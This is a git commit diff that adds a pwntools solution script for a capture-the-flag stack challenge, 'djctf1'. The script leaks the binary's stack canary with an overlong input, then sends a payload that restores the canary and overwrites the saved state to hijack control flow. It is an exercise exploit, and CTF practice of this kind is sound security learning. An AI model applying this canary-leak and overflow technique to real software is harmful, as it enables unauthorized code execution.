Renamed

2022-01-19 20:45:17 +08:00
parent 3a0e685f4d
commit 766d017e6e
41 changed files with 0 additions and 0 deletions
--- a/Canary/djCTF-1/answer.py
+++ b/Canary/djCTF-1/answer.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./djctf1')
+elf = ELF('./djctf1')
+#gdb.attach(p, "b pwnable\n b flag")
+
+# Canary Leak
+p.recvuntil("> ")
+p.sendline('0' * 0x18)
+p.recvuntil('0' * 0x18)
+canary_value = u64(p.recv(8)) - 0x0a
+print("Canary: " + hex(canary_value))
+
+# hijack control flow
+p.recvuntil("> ")
+#p.sendline('0' * 0x18 + p64(canary_value) + p64(0) + '\x00')
+p.sendline('0' * 0x18 + p64(canary_value) + p64(0))
+#time.sleep(10)
+p.interactive()